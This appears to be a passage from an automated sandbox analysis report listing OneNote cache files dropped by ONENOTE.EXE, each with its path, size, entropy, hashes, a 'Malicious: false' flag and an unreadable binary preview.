SHA-512:	5229C18228D8270D669CAE4EF5215A46D01DC65EEF4DDC2DF005FA7917E9C5CBF2DD19AC8287CAC0636A5D93CB0298BAFB4875634FCEC1F70F37A2E7A5608EF5
Malicious:	false
Preview:	2...>.......,...v... ...................................................................................................................................2...>...........v...T............................I.......I.qk..B.....LZKqK.....KqK.8.....]a...KqK.8.....]a...KqK..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............Ez.hL@..7..Bj../....N...^................l./X@.D.x.'...1........f........................................I.qk..B.....LZ............Ez.hL@..7..Bj../........Ez.hL@..7..Bj../.........KqK.....KqK.....KqK.........................................KqKj....KqKT.]..KqK.....KqK..B..KqKH....KqK..B..KqK..>.)KqK..J...................;........4...4...4.."..............KqK.KqK.KqK..z...y.. x.. ...........$........4......7...7........................;........4...4...4.........KqK.....KqK....#KqK............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001R.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.128767924111901
Encrypted:	false
SSDEEP:	96:LsjPyO1uyjEXlXS9ovTfRK+OR5PV2kRUJmK:Lsp1hQ1XS9YDRK+c
MD5:	35889BFCA4EB943C4AAF50021422CF29
SHA1:	4191614BFAC7C5229BD8E2EB11ECFF57E56BB361
SHA-256:	C38BBCF9A0FFF953B25DA65F6F6B75DF58D4E569A347CE27E4C251B0B98B5355
SHA-512:	61186D305E2F86C55BA74A0B56092F231697BBC0C57AC92A232957D50EF054DDFB0A51605FA22FE3E283DAC3B5D893E69452BFC0408FF71FBD171122B19B1266
Malicious:	false
Preview:	2...>.......(...v.......................................................................................................................................2...>...........v...P............................I.......I.qk..B.....LZ.r.......r...3....0...4'.r...3....0...4'.r...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............m.#.i.;./.....[h....N...^...............c.O\|@..C...._x..........f........................................I.qk..B.....LZ............m.#.i.;./.....[h........m.#.i.;./.....[h..........r.......r.......r...........................................r.j.....r.T.]...r.......r...B...r.H.....r...B...r...>.).r...J...................;........4...4...4.."...............r...r...r...z...y.. x.. ...........$........4......7...7........................;........4...4...4..........r.......r.....#.r.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001S.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	3.6171413175300526
Encrypted:	false
SSDEEP:	96:XEll+Xs/9TGcUcCLCh9zEqDej6zEYEG4IR1EzPWc4IGouQWpH4If+x:0X5RFCIgqJgFO0jWUGzQ8X
MD5:	285CE56CE912BB93621A538AB9FAB77B
SHA1:	174C1D5022AA1CDC59CEC2515E14F18BCC04B260
SHA-256:	5B82A28089DD2E8B6260EC8027C6D2FBA2D0846A23D26D25DE7F059D3EEDCB0A
SHA-512:	13A94E3FA4CAF2AF1CEEFA04D874A292C002949A323E8FDA9B53913F0AC52F335AB64FE76C48F181C048A7AA6AD7387817309AA3647DC334A45766C059D9F005
Malicious:	false
Preview:	\...,................................................................................................?..................................................\...,...............<......................................t..G..........=.......=.....5pa..r...#nF.T..!..m...o.#n.Xa....@.+D.z..P.Xa....=.....5pa..r....=............=.......=................................................A.I.....A.I...5N.3~.k..>i.k.....i.k...@.P..\1e.2...P...^...@.........................=.A.I.iVz.=~.................T).....=.......=X......=..G....=.......=..".....T)...D..T.v......X.......iVz..c..,0...e...B4.$...........GP..A..}.....J....................=~......=~.V..J..cX..1CX.......X..\.~0@.yT..(.....t..G............p...<..-'...0..p...X..\.~0@.yT..(..X.......>.......l.......Xa....@.+D.z..P.u+[oz+M.*`..#..D..Mz..A.tLCK.............0...........e....4.............."...P.r.o.j.e.c.t. .O.v.e.r.v.i.e.w.......B.^....F...r.QH.....(...........(..."...P.r.o.j.e.c.t. .O.v.e.r.v.i.e.w...j...P.a.g.e.L.o.c.I.D...L.o.c.V.e.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001T.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	4.580916330911426
Encrypted:	false
SSDEEP:	384:xBJ5plinI6nsRc7uGRt3rN5OKldHme98mQK7miIs6LFjwrKLN/Tudm6NBceQQ65B:xBJ56nI6sG7FRNrN5OKldHme98mQKii0
MD5:	E8665086507A7C2873AC17A996A76156
SHA1:	5A2B533055F7C593FE83F86CBDB671D196594B98
SHA-256:	29009B8D47CCB217A2389AB2A5E6683EA4588B5623765BD6732235EF2FC2CF51
SHA-512:	BD9766393240CB9B2CEDA5F747CA3D037C85B402F14B9A7C1F354840105B051BB1085EBDFA52AA1AF833B410E52F90647BF0044742577A54160DABCC335123C8
Malicious:	false
Preview:	....>...........v.......p@..X ..`J..........>...t...8...v........H..X ..PI..................................................................................>...........v........I..X ...I...............I.......I.qk..B.....LZL.o.....L.o~..V.5.m...T.N.....-.gN._..N...L.o~..V.5.m...TtL.o..I.qk..B.....LZ.I............I.......I...................................................I.t.....I................................................................4..'...'...............s......`..u)......N...^...............m.._...I.u..t./l............................................4....I.qk..B.....LZ..............s......`..u)...................................L.o.....L.o.....L.o.........................................L.oj....L.oT.h..L.o..D..L.o..-..L.oH....L.o.....L.o....%L.o..0...............;........4...4...4............'L.oDL.o..z...,4. .......$>........4....7.......................L.o3L.o.L.o.L.o.L.o.L.o.L.o..z...y.. x.. ........ ..$...$........&..$!..7!..7.........*...o.e.L.o.c.I.D...o.e.L.o.c

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001U.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:06:24], progressive, precision 8, 38x792, components 3
Category:	dropped
Size (bytes):	22203
Entropy (8bit):	6.977175130747846
Encrypted:	false
SSDEEP:	192:5q3R1VBvq3R1Flrk6Q0QPJJrR39joOVMJ25d1NkMhIwobbtAAAqYnLJZMJYZ2AC:xw6Q0WJR3FoOVMJIIlAAAqYnMJdD
MD5:	2D3128554F6286809B2C8E99DE5FD3F6
SHA1:	FC42CB04151D36F448093BDEFE33031A9B8D797D
SHA-256:	14FA2D16310485AA1CE41F6D774A3D637E8CF8B03C4F72990155DF274FDB6BD9
SHA-512:	D8531247A6E89ECABEA9C4A78F596CCE3493334EDF71AE4F7998FDDD0F80705948609C89756AB56FDFAB6D04DEC5F699A693801A772CA2EE2465BDD2CE5D2D5A
Malicious:	false
Preview:	......JFIF.....H.H.....XExif..MM..............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:06:24............................&.........................................................(.....................&..................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...H.....Go.Kxn.b..g...........%?_....O......q......7G......%%.V..8zm.].v?...jJ~._..>.......O;........o..rI.A.....n.a.........

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001V.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	4.024684364781696
Encrypted:	false
SSDEEP:	96:kxso9dWEfsXB9bkX/Pkf+y3/eHmfrmcBXeluDR/CgytyAZGc:kxso9pkR9IX/8fD/eHAmsXMuDR/CRG
MD5:	D25E0FB5D60D15E387C77C95EBB1BB57
SHA1:	C1EA1D341AF07BD5407972BD816251965B0407FD
SHA-256:	E3F4043816359424A8C23862B5C88FC462082327D9F44FB2599436D9A85F7CC5
SHA-512:	F31D6B43350009DB78BB6BBBDA66C0B893A01D2C34CAB8893FFB06DC07E91E73380FF0B7A9F29EA8739EAACB52154BCB87F4FECD56BECF64C8933CDA3F17F819
Malicious:	false
Preview:	2...>...........v.......................................................................................................................................2...>.......j...v...6............................I.......I.qk..B.....LZK%..)...K%....G.....%.K.K%....G.....%.K.K%...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'....................9(.K\|).....N...^................\|.. ..I...[..\|_...........@&....................................I.qk..B.....LZ...................9(.K\|)................9(.K\|)..........K%......K%......K%..........................................K%.j....K%.T)Z..K%...2..K%.....K%.H....K%...J.$K%.$.z.%K%..0...............;........4...4...4..............z...........................;...!..7......................C.a.l.i.b.r.i.................z.......R...................!..7............S.y.m.b.o.l...................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000020.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	52945
Entropy (8bit):	7.6490972666456765
Encrypted:	false
SSDEEP:	768:cjvqR0XvFaGCTJffi0tgybmWDoTw71kHUAnjvawrlp2+NUO8dWSNl3PF2PjK/q09:cyRffflgybmWoTw1UUADHUbU21MjpAD
MD5:	AD003F032F32FAC4672D4CE237FA5C5B
SHA1:	AE234931B452F0D649D91291763B919CF350EA49
SHA-256:	ADB1EBBE18D6CD8FF08AA9BF5C83CDB83BF9AA179698E34E93DBCDDE12F04D32
SHA-512:	ECA25FA657ECE3A66D3E650628E0F65D3BADD38864C028AB6553950A1A66D7D55482C85E9E565573E9E5AAFA91C2D53235971C644A266D41EB69F8E72E3A843B
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..AQ..aq....".....2....BR#r.b3$...C.Sc%...s5E......................!1.A..Q.aq"...2...#...B...Rb3..$..CSr...6............?......y_N.e.H7?........W..w....k\|...S..d.4.>.RW5z.$.i.)V.O....>o...c..&1.D..O..".ufbb..1...t..u=..K...m...~.....F..-.fb:i..=f..C.w.[{..~.7k....;..:..3....4.....$..m]...}....~q...9T.#..7.~..8...q.N;c..ffo.w...W..d........../t_........lWJE..).>..v;:=....Rrw#.m.n.n...E...vm.J}2N..\|.4...80.#..e....t.J..ZQ.x\|g/....F..e....k+vK...M..W.X.e.L..~...j.....kz....=...n:O.:..[.L,.+R...Y..zKNI....,..{e..U.'...}.......\|..t.]...~...b4......_.i..../.......m...a..n...v.j.?..Rc.$G\|.31..#..$?.........h.w....-... .a.%z..u......u.A....Fm..J.......G..[...w.....:....w/.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000021.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	3.5125815212859575
Encrypted:	false
SSDEEP:	192:40sPUdRWG1lRHmC9M1zB8RvC8yYl1JwzD1jXl9d8uJsRtMzTvN5m:4JiWG1lRHmKM1zi5hEzD1b7db2Rtijm
MD5:	97E614B6EF9B22A6D3C43F32A8598199
SHA1:	09D370030159DD74D726F5FB626B2097713CEE85
SHA-256:	736B8A58CBD0DF2CA560E3CB221EC9E5123EBD5235CCD0DEFDD980AAF1A8CD53
SHA-512:	1A2C65033D7B18113DBE5B2447A5C5595960FABA0C215DB43564A7612D430A5447E94D7F4E52569D667C706B50A90404B5646671221FBCA8982B71F3C1C892AF
Malicious:	false
Preview:	2...>...........v.......................................................................................................................................2...>.......0...v................................I.......I.qk..B.....LZW..9...W.F.....t..0.E`W.F.....t..0.E`W...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............ip.I..M.9.1.........N...^..................B.k.L.qg;1..g........"...4...............................b....I.qk..B.....LZ............ip.I..M.9.1.............ip.I..M.9.1..............W......W......W..........................................W.j....W.T.x..W......W...4..W.H....W. ....W.$....W...j...............;........4...4...4.............W.:W.jW...z...y.. x.. ...........$........!..7!..7.....*...o.e.L.o.c.I.D...o.e.L.o.c.C.o.m.m.e.n.t.......0.0.0.1.0...........W.:W.LW...z...y.. x.. ...........$........!..7!.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000022.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	25622
Entropy (8bit):	7.058784902089801
Encrypted:	false
SSDEEP:	384:EhK81gTCyJ/Gf9Aw3t8w8EtdPeGDh6bEi1Ie1u4ZbvgwTwrSRh7ZKNpIGY:IjcRXwdJvtdGsUbEi1IeY8vgwTyC1+Y
MD5:	F8CCFC24DEB1D991EBE085E1B2D7D9BF
SHA1:	AF76C22A765434AEDA134924C517C84107F4FED5
SHA-256:	7354001527AB554C44E7D6981B86DD933B7DC2E0D3DC8512AD3EECD843245C52
SHA-512:	818BC3690B01B30BC571E4CF45EC8D1AFCAECBAB003532644381F1CF730A5B3486862D08F7579B2D3D89167AD7DF35028881245C9550B0DA23D1F81A720A9704
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!...1A.Qaq.........."2Rr.#.t6..B..3S$4..v.b..Cs.%5..8..cUV.(.DEe.&Ff...T.d.......................!.1A..Qaq...s4....2r..S"BR.3....b#C$.....c............?..D.."}:......&&...?3..W.q.......]...m.Y.k1......K).J...uV.b.../.0.E.H..4..W_T.[t.V.w.9.x.qe.L..o.oL.....d.\.....6.\|.o...}..H{Yn..E...6Y3.l.e..D.:,.n.%...t...m.........,+,..\|..n.....6....f........6.../$../Vi..H...e.f.F.zn.).n.E..2sTn.i...Yb?6+H&...Bf......z.o.^7[..u.:o....t.s=.....(.s.....f.g....q9o.u1L.N...smzE..[>...+\O....j.<....j.c.W.............U..+.F/.'..W...T./W...>i01./....j.s."..Q...{...a._~OW...Rp.).e..W..Q4)<..'..W...q...'..U..z..g......U}...O....w....0F:.N..V.3W.\|..'z0.]...j..U[v..g$D.Lc[.e...UW.m0+

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000023.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	3.252979000195995
Encrypted:	false
SSDEEP:	384:ZoIBueOar4DP6ugycf/LbRSz4KsxaMwAm:ZoIBu0r4DP6ugzf/LbR44KsxaMwAm
MD5:	363217343EB68A29B3BE41EFB7B840E6
SHA1:	90D29CC2BA3B9590AADF83A0B148E3DEABB57A48
SHA-256:	BD08552F564EDCB001DF606F46E5FB924A9A522FB077ADB824EC139EA5F27BEC
SHA-512:	301FEF02ED67980CCDB331B032A533D9516DE17EE25787572133687842803D4DAF9155E60CF31652481AD762A7F5B0100EB83B58347C20E630235839F4213964
Malicious:	false
Preview:	2...>.......r...v.......p ..X/..2...>.......j...v...6....-..x........LZ............Pw.3.G.H..^./b.........Pw.3.G.H..^./b.....2...>.......r...v........-..x...........v........-..x...................]...T...]...\.e.0dB...X..I.......I.qk..B.....LZ]...\.e.0dB...X.]....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............P...=.. .!.#......N...^...............Pw.3.G.H..^./b.........4...............Pw.3.G.H..^./b..........I.qk..B.....LZ............P...=.. .!.#...................................].......].......]...........................................]..j....]..T)y..].......]....4..]....a..]....l..]..$.N.$]..$.................;........4...4...4............']..%]...]....z...,4. ...........$>........4.@!..7..............................D..n4..o4..p4...4. ..u-...............................;........4...4...4.............].......]......

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000024.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	15740
Entropy (8bit):	6.0674556182683945
Encrypted:	false
SSDEEP:	192:Elv3GG8/OOs+GouFdxMlxjoPyerzkpuOo2vPMc62PaJseZC+BJoS/:EtNiwdxMlZoPhzkpuOo2PMc6rX8+B6+
MD5:	FFA5EC40DC9A0FD10EB9E6355142D6A6
SHA1:	3D3D6A7E086B3C610C08F1F3E3F883604F06F2A4
SHA-256:	D74C3973C8D1F7C77274691AFB1AA934940674341D7EEE563BE75E563281BDFD
SHA-512:	6FAF2A24D06E6008F3579C7CEC90C2887462BDF83FAD7372FBB74B8DE90340B580E9836F309B68A9794597A598F7DCDA661C9A58DA6D8187C69083B7A17C9CD9
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!.1.....AQ..aq.g..8...."r....2.FG..#.E..7.Rb..Cc..D.v.B..3s..$d.%5Uu..&6fW'w........................!....1Aa...d..5e.6.q...Q..."2b.c..r3DE..BRs4U.#C.S.T............?...u.&0...cV.T.I...1..=4....Ce_.g.q.=F.M:>)...k..pm..h..=........S....)Ja8x...b.).=5.q..0......k.M.....1?-.G.b&.5..Ep.8t...'...R)..ta.F$bXO]tW.b.6#.t.XWN..ZW......].....G....x&&f..'L.....7...\...'.8...~`.sa...............................................X........qo...SMk...'.V...i..hb.}&?/.k.:>l.^....>Y...<}...&.jY.Gn.MKejyV......D......gf.0....t.nw..XQ...H.B.....=8.UkR.....Hm..w..]...k...#Z...F../.gjWvf.....w.aZ].2..5..^...VZv..._.7..a.\|...:.B...,f...............~....m.;_.....-.e.y.w.[m.].bu.b.f+.E++\.....Y..7

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000025.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	3.7586583788719015
Encrypted:	false
SSDEEP:	192:gsLKixW4Xpb9N95/tctASvzox0reLIic6XwAfSPRt2+ybmL:FdzX59P5/tcnc0reflwKSPRtJy6L
MD5:	44A397B8E4404B123D54F31E46D9E032
SHA1:	7EB6EE2FDEC41150A51A102C3A26C7950B1BB6F4
SHA-256:	3B4A24884D17C28ED4304FB1C7C3711630986277626AE8ACF1683BBFEB34964D
SHA-512:	A23B47FDB75574024E9F597CF3072AB580CA224883D86936D14AF09DF93B977EF4022948554C59A7347277AE0E5D6639E5EDAF82E27C6CAF02DD9138793236B9
Malicious:	false
Preview:	2...>...h.......v........ .. !..2...>...........v.......@................................................................................................................................................I.......I.qk..B.....LZ..n.9.....n.v.N.'..D..>...n.v.N.'..D..>...n..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............\|..Zj..?}S.IG.....N...^.................i.MLvM..Kn................>....................................I.qk..B.....LZ.............\|..Zj..?}S.IG....................................n.......n.......n...........................................nj......nT.~....n.......n..P....nH......n ......n$......n..n...............;........4...4...4...............n:..nj..n..z...y.. x.. ...........$........!..7!..7.....*...o.e.L.o.c.I.D...o.e.L.o.c.C.o.m.m.e.n.t.......0.0.0.1.0.............n:..nL..n..z...y.. x.. ...........$........!..7!.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000026.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	55804
Entropy (8bit):	7.433623355028275
Encrypted:	false
SSDEEP:	1536:gVvci05lhVbfBcWvBLeynluexaWqzww/u5:gVUZhHDljaHww/u5
MD5:	4126992F65FE53D3E3E78F6B27FD49DC
SHA1:	BC0D76B69310DA9B909D3EE4CECBFE5F386BFB45
SHA-256:	3FBE3C1C238BD7DBC67F8CFF5F3BDDFD513C96A9851B9616477947D21DFF4B2E
SHA-512:	624853F5E56D224C8188F122B2C4724F867D4099E7FAAFB9C945BE7E2907900ADCF4AE97AB08909CF94E96FB6F381E3B6396D560D93EB2731E4E69CBFE628F10
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d..............................................................................................!1...AQ.aq"2.....BR..8x..r#..9b....3....CS$.'.cs.......7Gw.(.4%5&..Wg.h......tEVfv..H..........................!1A..Qa.q...."2..u6....BRr.#...b..3s..d...7.Cc.$Tt..S4.5Ue..&..%.................?...,...8..{..S.y.N....%..q.8..H[5....o..xg........)c(.eO.YO..._D..x.U.....%.S.r.r._.^..Su.h.Q.t.:.#?....x..B.S...Q.....oqF..%..8'.qx....%.2JKjF..{y.w0.a.RMb.c.Q{%....eW'..[IV..'ZW3...[...MN.....rO.:....$.i..7....Vrrr...I.r..M..Qo..j....q.^...N...J......%.J..)F...>$.....u........o...+......[.....t....R}.I..R..S..GB..:......).6_[^Xft...F.1.....zP....,.#....MG.T..Q.F.....)Fi../.I...,%.voEb.b.Z..V3..FT.}..[Z{....wd.z.e.....QwW(.).t..\..'....:)<W.<..&k...caRT.X(..K.....:f...]...q..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000027.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	4.716170186823829
Encrypted:	false
SSDEEP:	192:oks6iTCTqzfXAf/weXAVXn69ekRtJBp4o69MFCL9Rk7dXQ/rJ0QTD8WlgeAEs:q6i0qzXiDXA6hRtJBp4o+MFC5R/TJ0QA
MD5:	DA037CE1EA72C24CEBA69BBC2DA442DE
SHA1:	9ED0583913D3B85891EB516B385BCB4C5F72BBC2
SHA-256:	D583E1172EACC7E0E966A2C43015931770293424B8697C1BC69BD4442E0472B5
SHA-512:	E0C615F41A1742ECD8076A46CFCC850B37D93A54BB847C22D21EEB3BBBFFF41A2DCD920DB9384996AB579A6235726F01A2CAD7F6BAC4BF4F999777B5409D74E4
Malicious:	false
Preview:	4...>.......^...v...2...@ ...+..4...>...........v...z...@..................................................................................................................................................O........12.2..v...M.I.......I.qk..B.....L......12.2..v...M.....I.qk..B.....LZ.I..=.+uOe8M....4.e.=.+...........I.......I...................................................I.t.....I................................................................4..'...'.............TK.x.k&@..........N...^................~...2O......+........B...Z....................................I.qk..B.....LZ............TK.x.k&@......................................................................................................j.......T.u.......d...............2.......m.....$.#.$...$.........z.......R...................!..7............W.i.n.g.d.i.n.g.s......333..................;........4...4...4................:...L...Y...K.....z...y.. x.. ........ ..$...$........!..7!..7............o.e.L.o.c.I.D...o.e.L

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000028.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	41893
Entropy (8bit):	7.52654558351485
Encrypted:	false
SSDEEP:	768:pZvVQkUbOHxx3pvVmO5rsP5gUdXwFMuv53knzyncaXgRDqPU:pZkijV5wScXwFMYknzucaXgRyU
MD5:	F25427EFECFEE786D5A9F630726DD140
SHA1:	BC612A86FF985AB569ED1A1EA5FFC4FDB18FC605
SHA-256:	5A36960DF32817E8426BD40A88F88B04FB55B84BAEF60F1E71E0872217FDB134
SHA-512:	B102F34385196D630F198667E874F25ADBC737426FDAE0747EC799B33632E5DC92999C7C715DC84D904342738930267AB1709870BDAA842243E4C283FE5E1554
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...........................................................................................!.1AQ....aq......"......2...Xx..9BRr#.b3$..&..g.8....%F'G.(H.Ss..D5E..v..W..Cc.deu..7w.h.).....................!.1....A..Qaq...Ttu.6..."R..5...2B..S....bcs.Dd%&r3C...#$...Ue.............?..R...%.R...t.MQ.l...v...V]..n...Zw....M....4..F.&&bb0.:]l......ay.r<..3.l.Q^.........I54.N2.8..2s...w..r6.......[1Zh....O...9..>...B......x]...r.\.\..v..~....y.QT.3.......=....r..}.l.....o;....M..C1....w)...+o1f.]...MoA.E..s5..i.\....miGsy..m\.Zj....I'YU.\tU6La5v.>.K..m.]1.......k..0....</5v.V7lY.e.vV.+./[....f..u{....s.}.Rb.Z.....Y.6]..m....V.\...Mr.=r...K...l..%..m^.......X.(..fG..[Fly.jL.a4..vs..o.e..q.9km..w1.yg.....r_.*h.n..5i.-.{Y.l...<...'Or.s..Z....../JP.....\FV.S..............m

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000029.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	4.591703543138813
Encrypted:	false
SSDEEP:	192:hfpsOBrVgdU3cksUo0wveShhXugQgX0ap/lXpRt48PpoJ6XW4C6uw9vGj169NEQG:hfOQrUU3crUMeeuoh9XpRtjoJ6X5usv0
MD5:	0610CA601F75776031974F4C5C0A07E9
SHA1:	14F57F29C00E90828E54A8E8BD7C17E2D488605B
SHA-256:	D042367F4CBCC5C2675328AE00DE8BB9002F9EC6AC63DBF01938FB5EE156EFD1
SHA-512:	6C418AD6E1641410172415CC57C0A04CFD4C5E00C25693089907E0622DD0F2B0779AFAD19DF9A8718D652ABAA31DB590568F7139D8CA5F69BE2770E2E1DABCFE
Malicious:	false
Preview:	2...>.......<...v.......` ..`+..2...>...........v...X...@...P...........................................................................................................................................I.......I.qk..B.....LZ8d..G...8d...z....Z...zu8d...z....Z...zu8d...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............;1.D{...o........N...^...............:..9..%H.N...%.#............j....................................I.qk..B.....LZ..............;1.D{...o.....................................8d......8d......8d..........................................8d.j....8d.T)z..8d...`..8d......8d...D..8d...a..8d.$.6.$8d.$.................;........4...4...4.............8d.;8d.Y8d.X8d...z...y.. x.. ........ ..$...$........D...E.......!..7!..7............o.e.L.o.c.I.D...o.e.L.o.c.C.o.m.m.e.n.t.......0.0.0.9.........$....................z.......R.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002A.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	14177
Entropy (8bit):	5.705782002886174
Encrypted:	false
SSDEEP:	192:EbgGcV/hlvpfal7rgYa8S7auAxwfuSTmCSNoFQ6NO7L:EbgGcVnpwimnd38FdQL
MD5:	7CDCE7EEBF795998DA6CAC11D363291C
SHA1:	183B4CC25B50A80D3EC7CCE4BF445BCFBAA6F224
SHA-256:	DE35AF949D4F83E97EE22F817AFE2531CC4B59FF9EE6026DCA7ECEBC5CF2737F
SHA-512:	560FB15A9C12758D11BB40B742A6EAD755F15AD10D6C5DEBA67F7BC8A2AE67C860831914CBCBCDED9E6B2D1D5F26A636B9BCEF178151F70B4D027316F94F27E1
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!.1..A....Qa".q..2.....&...B%6.'..R#3.$E.r457bS.DUFV.Wg(.......................1...3.Q..2Rr....s.4.!Aq.S.aC5B$%............?...n.Liq.}.{#....3/gg.1.M +..~3...q..+=..:.g.i1;P)7.....q..n.s"p...wx........v.t.f;..L/..~....y.r[.r.....n.n3..6i..g..}../........3..x.L.i?We..l.......~..<.;..6..o.....N.t.o6.l..~.......<...m.V...Q.7k.u./wq.t..;.I...}..{...>.L..3m..a....yd......6~.f..~Y..}+..<.[w..'-..?.v.7...v.u..4.......1];..u.MO.......s..p..ms.'.O-o...O......m.k.e....)t....i>..E\|....,iOyD\|.{......g.n...cu....=..........h.\.Q:?g/?.I.3._...t...d.n.0.%y....S.Q....S.&K.w..&wY<....%.g.v.....$y..#,i;.=...t...I6..yO..o.d..w\k...~......)..rK.......].u....N....e.s..kU.u..'}

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002B.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	4.619425893291662
Encrypted:	false
SSDEEP:	384:5t7/Iu/Z8qNXNTwLZ0qZPtL5Cxvj9D2kg0xWmQX3f/XtPF1r78ARJB0IL1Pk2IFQ:51/JNMLXJt9ExwtL1P3MN9Olqf3fXe
MD5:	A1913012389FD9FE0D77B41AFD50DE7D
SHA1:	B46A962DC8840548F51447B1A599D035E0B72D38
SHA-256:	3B71AA9951AAAC8BFA73717F101A13FBD09385F88F5FEB08F03EF7B63A29106A
SHA-512:	91C08D9C5AE915CB41A3507265AEE3D53B3B3FB2C6B91FAC08E35B95E4563D621CC5D3CD3AD8AFA728CAFD42EC4304D50DCC0C034921D8102EC9D40DDEFDB3F2
Malicious:	false
